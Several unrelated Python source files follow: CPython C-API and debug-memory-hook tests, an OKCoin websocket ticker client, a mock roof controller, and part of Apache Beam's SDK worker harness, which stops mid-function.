(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def test_subinterps(self):
# This is just a "don't crash" test
out, err = self.run_embedded_interpreter()
if support.verbose:
print()
print(out)
print(err)
@staticmethod
def _get_default_pipe_encoding():
rp, wp = os.pipe()
try:
with os.fdopen(wp, 'w') as w:
default_pipe_encoding = w.encoding
finally:
os.close(rp)
return default_pipe_encoding
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
out, err = self.run_embedded_interpreter("forced_io_encoding")
if support.verbose:
print()
print(out)
print(err)
expected_errors = sys.__stdout__.errors
expected_stdin_encoding = sys.__stdin__.encoding
expected_pipe_encoding = self._get_default_pipe_encoding()
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stdin_encoding,
out_encoding=expected_pipe_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
okcoin.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException
import requests
# Import Homebrew
from bitex.api.WSS.base import WSSAPI
# Init Logging Facilities
log = logging.getLogger(__name__)
class OKCoinWSS(WSSAPI):
def __init__(self):
        super(OKCoinWSS, self).__init__('wss://real.okcoin.com:10440/websocket/okcoinapi',
'OKCoin')
self.conn = None
self.pairs = ['BTC', 'LTC']
self._data_thread = None
def start(self):
super(OKCoinWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
super(OKCoinWSS, self).stop()
self._data_thread.join()
def _process_data(self):
self.conn = create_connection(self.addr, timeout=4)
for pair in self.pairs:
payload = [{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_ticker' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_depth_60' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_trades' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_kline_1min' % pair}]
log.debug(payload)
self.conn.send(json.dumps(payload))
while self.running:
try:
data = json.loads(self.conn.recv())
            except (WebSocketTimeoutException, ConnectionResetError):
                self._controller_q.put('restart')
                continue  # avoid using stale or undefined data after a failed recv()
if 'data' in data:
pair = ''.join(data['channel'].split('spot')[1].split('_')[:2]).upper()
self.data_q.put((data['channel'], pair, data['data'],
time.time()))
else:
log.debug(data)
self.conn = None
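
# Hedged illustration (not part of the original module): how _process_data()
# above recovers the currency pair from an OKCoin channel name. The channel
# string is a sample matching the subscriptions built in the payload loop.
def _demo_pair_from_channel():
    channel = 'ok_sub_spotusd_btc_ticker'
    pair = ''.join(channel.split('spot')[1].split('_')[:2]).upper()
    return pair  # 'USDBTC'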
|
roof_control.py
|
from threading import Thread
from time import sleep
from components.roof_control import RoofControl
class MockRoofControl(RoofControl):
def __init__(self):
super().__init__()
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_low()
def open(self):
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_high()
t = Thread(target=self.__wait_for_open__, args=(self.roof_open_switch.pin,))
t.start()
super().open()
t.join()
return True
def close(self):
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_high()
t = Thread(target=self.__wait_for_open__, args=(self.roof_closed_switch.pin,))
t.start()
super().close()
t.join()
return True
def __wait_for_open__(self, pin):
sleep(10)
pin.drive_low()
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self._fns = {}
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
# workers for process/finalize bundle.
self.workers = queue.Queue()
# one worker for progress/split request.
self.progress_worker = SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory)
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
# finalize and process share one thread pool.
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create process workers
for _ in range(self._worker_count):
      # SdkHarness manages function registration and shares self._fns with all
      # the workers. This is needed because function registration (register)
      # and execution (process_bundle) are sent over different requests and we
      # do not really know which worker is going to process the bundle
      # for a function until we get the process_bundle request. Moreover, the
      # same function is reused by different process bundle calls and is
      # potentially executed by different workers. Hence we need a
      # centralized function list shared among all the workers.
self.workers.put(
SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(name='SdkHarness_monitor',
target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
        # Name spacing the request method with '_request_'. The called method
        # will be like self._request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
    logging.debug(
        'Currently using %s threads.', len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
# only process progress/split request when a bundle is in processing.
if (instruction_reference in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.progress_worker.do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _request_finalize_bundle(self, request):
def task():
# Get one available worker.
worker = self.workers.get()
try:
self._execute(
lambda: worker.do_instruction(request), request)
finally:
# Put the worker back in the free worker pool.
self.workers.put(worker)
self._process_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
              logging.warning('Unable to schedule instruction %s for %s',
                              instruction_id, scheduling_delay)
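# Illustrative sketch (hypothetical names, not part of SdkHarness) of the
# sentinel-terminated queue generator that run() hands to the Control stream:
# worker threads push responses onto a queue, and pushing a single sentinel
# object ends the generator, which in turn ends the outgoing gRPC stream.
def _demo_sentinel_generator():
  out = queue.Queue()
  no_more_work = object()
  def drain():
    while True:
      item = out.get()
      if item is no_more_work:
        return
      yield item
  out.put('response-1')
  out.put('response-2')
  out.put(no_more_work)
  # Consumes the two responses, then stops cleanly at the sentinel.
  return list(drain())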
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
    data_channel_factory (``data_plane.DataChannelFactory``): Used to create
      data channels to be used by a ``bundle_processor.BundleProcessor``
      during processing.
    active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
      containing the ``bundle_processor.BundleProcessor`` objects that are
      currently processing the corresponding instruction.
    cached_bundle_processors (dict): A dictionary, indexed by bundle descriptor
      id, of cached ``bundle_processor.BundleProcessor`` objects that are not
      currently processing any bundle.
"""
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
for instruction_id in self.active_bundle_processors:
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
for cached_bundle_processors in self.cached_bundle_processors.values():
while len(cached_bundle_processors) > 0:
cached_bundle_processors.pop().shutdown()
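# Minimal, self-contained sketch (hypothetical _DemoProcessor/_DemoCache, not
# part of the Beam API) of the reuse pattern BundleProcessorCache relies on:
# processors are pooled per descriptor id in plain lists, handed out for one
# instruction at a time, reset and returned on success, and discarded on
# failure. list.pop()/append() are atomic under CPython's GIL, which is why
# the hand-out path above needs no explicit lock.
class _DemoProcessor(object):
  def __init__(self, descriptor_id):
    self.descriptor_id = descriptor_id
  def reset(self):
    pass  # would clear per-bundle state before reuse
  def shutdown(self):
    pass  # would release external resources
class _DemoCache(object):
  def __init__(self):
    self.active = {}   # instruction_id -> (descriptor_id, processor)
    self.cached = {}   # descriptor_id -> [idle processors]
  def get(self, instruction_id, descriptor_id):
    try:
      processor = self.cached.setdefault(descriptor_id, []).pop()
    except IndexError:
      processor = _DemoProcessor(descriptor_id)
    self.active[instruction_id] = descriptor_id, processor
    return processor
  def release(self, instruction_id):
    descriptor_id, processor = self.active.pop(instruction_id)
    processor.reset()
    self.cached.setdefault(descriptor_id, []).append(processor)
  def discard(self, instruction_id):
    self.active.pop(instruction_id)[1].shutdown()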
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
      # E.g. if register is set, this will call self.register(request.register)
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
    This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` comes as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos(),
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
def finalize_bundle(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_reference)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def stop(self):
self.bundle_processor_cache.shutdown()
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
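# Illustrative alternative to the nested yields in maybe_profile above,
# assuming Python 3.7+ (contextlib.nullcontext), so it is a sketch rather than
# a drop-in for this 2/3-compatible module; _maybe_profile_alt is a
# hypothetical name.
def _maybe_profile_alt(profiler_factory, instruction_id):
  profiler = profiler_factory(instruction_id) if profiler_factory else None
  # Either the real profiler context manager or a no-op one.
  return profiler if profiler else contextlib.nullcontext()
# Usage sketch:   with _maybe_profile_alt(factory, 'instr-1'): process()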
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
  """An abstract factory for creating ``StateHandler`` objects."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
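# Minimal sketch of the check/lock/re-check idiom used by create_state_handler
# above: the unlocked lookup keeps the common cache-hit path lock-free, while
# the second lookup under the lock stops two threads from both building a
# handler for the same url. _DemoChannelCache and expensive_create are
# illustrative stand-ins for the gRPC channel construction.
class _DemoChannelCache(object):
  def __init__(self, expensive_create):
    self._create = expensive_create
    self._cache = {}
    self._lock = threading.Lock()
  def get(self, url):
    if url not in self._cache:        # fast path, no lock taken
      with self._lock:
        if url not in self._cache:    # re-check while holding the lock
          self._cache[url] = self._create(url)
    return self._cache[url]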
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
  def blocking_get(self, state_key, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for a ProcessBundleDescriptor '
        'without a state ApiServiceDescriptor for instruction %s and state '
        'key %s.' % (instruction_reference, state_key))
  def blocking_append(self, state_key, data, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for a ProcessBundleDescriptor '
        'without a state ApiServiceDescriptor for instruction %s and state '
        'key %s.' % (instruction_reference, state_key))
  def blocking_clear(self, state_key, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for a ProcessBundleDescriptor '
        'without a state ApiServiceDescriptor for instruction %s and state '
        'key %s.' % (instruction_reference, state_key))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
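# Self-contained sketch (illustrative only) of the correlation pattern that
# GrpcStateHandler builds on _Future: each request gets an id, the caller
# parks a _Future under that id, and a background reader completes the future
# when the matching response arrives. A queue.Queue stands in for the gRPC
# response stream here.
def _demo_request_response_correlation():
  responses = queue.Queue()
  futures = {}
  def reader():
    while True:
      response_id, value = responses.get()
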